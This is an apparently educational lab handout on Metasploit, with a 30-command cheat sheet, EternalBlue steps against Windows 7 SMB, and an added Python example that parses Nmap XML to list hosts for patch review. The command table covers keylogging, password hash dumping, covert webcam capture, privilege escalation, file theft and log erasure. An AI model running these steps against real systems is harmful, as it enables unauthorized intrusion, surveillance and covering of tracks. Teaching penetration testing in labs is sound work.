LAB 10

Metasploit Exploitation Manual

Exploiting vulnerabilities in target systems to gain unauthorized access.

30 Essential MSF Commands

Before you start hacking, these commands are your "cheat sheet".

Command | Why use it? (Action)
msfconsole | Start the framework.
search [exploit_name] | Find a vulnerability (e.g., search smb).
use [path/to/module] | Activate the selected exploit.
show options | Check the RHOST and LHOST settings.
set RHOSTS [Target_IP] | Set the target machine's IP.
set LHOST [Your_IP] | Set your own (attacker) machine's IP.
exploit / run | Execute the attack.
sessions -l | List all active hacked sessions.
sessions -i [ID] | Enter a specific hacked session.
background | Leave the session (without closing it).
getuid | Check which user you are (Meterpreter).
sysinfo | Check the target PC's OS and architecture.
screenshot | Take a live photo of the target PC's screen.
keyscan_start | Start the keylogger (everything is recorded).
keyscan_dump | View the typed passwords.
hashdump | Extract passwords (hashes) from the database.
shell | Open the target's normal CMD prompt.
upload [file_path] | Send a file/virus to the target PC.
download [file_path] | Steal a file from the target PC.
ps | View all apps running on the target.
migrate [PID] | Hiding: hide yourself inside a safe app.
clearev | Erase your footprints (logs).
webcam_list | List the target's webcams.
webcam_snap | Take a photo with the target's camera without notice.
getsystem | Go from a normal user to the Admin/System user.
pwd | Check which folder of the target you are in.
ls | View all files in the target folder.
search -f *.pdf | Find PDF files on the target's PC.
reboot | Restart the target PC.
exit | Close the session and leave.

Step 1: Target Scanning

First, find out the service version with Nmap. If the target is Windows 7 and the SMB port is open, it may be vulnerable.

search eternalblue
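
The same Step 1 check, seen from the lab owner's side: an added example (not part of the original manual) that reads Nmap XML output and lists hosts with 445/tcp open that look like Windows 7, so they can be queued for patch review. The sample XML, the addresses and the function name smb_review_list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -O -oX` output; addresses are documentation ranges.
SAMPLE_XML = """<nmaprun>
<host><address addr="192.0.2.10" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/>
  <service name="microsoft-ds" product="Windows 7 Professional 7601 Service Pack 1 microsoft-ds"/></port></ports>
 <os><osmatch name="Microsoft Windows 7 SP1" accuracy="100"/></os></host>
<host><address addr="192.0.2.11" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="filtered"/>
  <service name="microsoft-ds"/></port></ports>
 <os><osmatch name="Microsoft Windows 7 SP1" accuracy="96"/></os></host>
<host><address addr="192.0.2.12" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/>
  <service name="microsoft-ds" product="Samba smbd" version="4.6.2"/></port></ports>
 <os><osmatch name="Linux 4.15" accuracy="98"/></os></host>
<host><address addr="192.0.2.13" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/>
  <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port></ports>
</host>
</nmaprun>"""


def smb_review_list(xml_text, needle="windows 7"):
    """Return [(ip, evidence)] for hosts with 445/tcp open that look like Windows 7."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        # OS guesses are only present when the scan ran with -O.
        os_names = [m.get("name", "") for m in host.iter("osmatch")]
        for port in host.iter("port"):
            if (port.get("protocol"), port.get("portid")) != ("tcp", "445"):
                continue
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered or closed SMB is not reachable, so skip it
            svc = port.find("service")
            banner = svc.get("product", "") if svc is not None else ""
            # Keep every string that supports the Windows 7 guess as evidence.
            evidence = [s for s in [banner] + os_names if needle in s.lower()]
            if evidence:
                findings.append((addr.get("addr"), evidence))
    return findings


if __name__ == "__main__":
    for ip, evidence in smb_review_list(SAMPLE_XML):
        print(ip, "->", "; ".join(evidence))
```

A banner such as "Windows 7 - 10" is ambiguous, so a listed host is a candidate for patch review, not a confirmed finding.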

Step 2: Configuring Exploit

After selecting the module, set the parameters. Always keep in mind that LHOST is your IP and RHOST is the target's.

Logic: The exploit is the path through which we get inside, and the payload (Meterpreter) is the agent that goes inside and does our work.

Step 3: Gaining Access

Run the exploit command. If everything is right, you will get a meterpreter prompt.

exploit

Now you can collect data by running screenshot or keyscan_start.

Ethical Warning

Metasploit is a dangerous weapon. Use it only in your own local labs (VirtualBox) or for authorized testing. Running it on other people's devices is illegal.